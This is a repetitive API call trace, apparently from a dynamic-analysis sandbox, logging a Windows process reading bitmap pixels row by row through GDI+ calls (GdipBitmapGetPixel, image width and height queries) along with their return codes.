[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=72, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=73, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=74, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=75, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=76, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=77, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=78, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=79, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=80, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=81, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=82, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=83, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=84, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=85, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=86, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=87, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=88, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=89, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=90, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=91, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=92, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=93, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=94, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=95, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=96, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=97, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=98, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=99, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=100, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=101, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=102, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=103, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=104, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=105, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=106, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=107, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=108, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=109, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=110, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=111, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=112, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=113, color=0x19de90) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=114, color=0x19de90) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=115, color=0x19de90) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=116, color=0x19de90) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=117, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=118, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=119, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=120, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=121, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=122, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.368] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=123, color=0x19de90) returned 0x0
[0164.368] GetLastError () returned 0x57
[0164.368] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.368] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=124, color=0x19de90) returned 0x0
[0164.368] GetLastError () returned 0x57
[0164.368] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.368] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=125, color=0x19de90) returned 0x0
[0164.368] GetLastError () returned 0x57
[0164.368] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.368] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=126, color=0x19de90) returned 0x0
[0164.368] GetLastError () returned 0x57
[0164.368] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=127, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=128, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=129, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=130, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=131, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=132, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.370] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=133, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.370] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=134, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.370] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=135, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.370] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=136, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=137, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.371] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=138, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.371] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=139, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.371] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=140, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.371] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=141, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=142, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.372] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=143, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.372] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=144, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.372] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=145, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.372] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=146, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=147, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=148, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=149, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=150, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=151, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.374] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.374] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.374] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=152, color=0x19de90) returned 0x0
[0164.374] GetLastError () returned 0x57
[0164.374] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.374] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.374] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=153, color=0x19de90) returned 0x0
[0164.374] GetLastError () returned 0x57
[0164.374] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.374] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.374] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=154, color=0x19de90) returned 0x0
[0164.374] GetLastError () returned 0x57
[0164.374] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=155, color=0x19de90) returned 0x0
[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=156, color=0x19de90) returned 0x0
